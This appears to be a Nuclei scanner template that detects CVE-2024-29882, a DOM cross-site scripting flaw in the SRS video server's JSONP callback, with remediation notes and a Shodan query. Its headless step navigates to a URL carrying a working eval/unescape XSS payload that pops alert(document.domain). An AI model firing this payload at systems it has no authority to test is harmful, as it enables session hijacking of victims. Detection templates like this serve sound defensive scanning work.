id: CVE-2024-29882

info:
  name: HTTP API DOM - XSS on JSONP callback
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    SRS is a simple, high-efficiency, real-time video server. SRS's `/api/v1/vhosts/vid-<id>?callback=<payload>` endpoint didn't filter the callback function name which led to injecting malicious javascript payloads and executing XSS ( Cross-Site Scripting). This vulnerability is fixed in 5.0.210 and 6.0.121.
  remediation: |
    Upgrade Simple Realtime Server (SRS) to version 5.0.210, 6.0.121, or later that properly sanitizes the JSONP callback parameter.
  impact: |
    Attackers can execute arbitrary JavaScript in the context of the victim's browser, potentially leading to session hijacking or defacement.
  reference:
    - https://github.com/ossrs/srs/commit/244ce7bc013a0b805274a65132a2980680ba6b9d
    - https://github.com/ossrs/srs/security/advisories/GHSA-gv9r-qcjc-5hj7
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2024-29882
    cwe-id: CWE-79
    epss-score: 0.01086
    epss-percentile: 0.60905
  metadata:
    verified: true
    max-request: 1
    vendor: ossrs
    product: simple_realtime_server
    shodan-query: http.favicon.hash:1386054408
  tags: cve,cve2024,srs,dom,xss,vuln

headless:
  - steps:
      - args:
          url: '{{BaseURL}}/console/en_index.html?alert(document.domain)#/vhosts/vid-xsedfv%3Fcallback=eval(unescape(location.search.slice(1)))%252f%252f'
        action: navigate

      - action: waitdialog
        name: object_dom

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - object_dom == true

      - type: word
        part: body
        words:
          - "<title>SRS"
          - "ConnectSRS</a>"
        condition: or
        case-insensitive: true
# digest: 4a0a0047304502207215647ea4e0007886948761294c047eb2ca2360f0ef92fb717199af9fe89d6e022100a65e1e65ee36cc36bba682994959fa0283f6ae091a1ec40d5d81f1e4bf532bc6:922c64590222798bb761d5b6d8e72950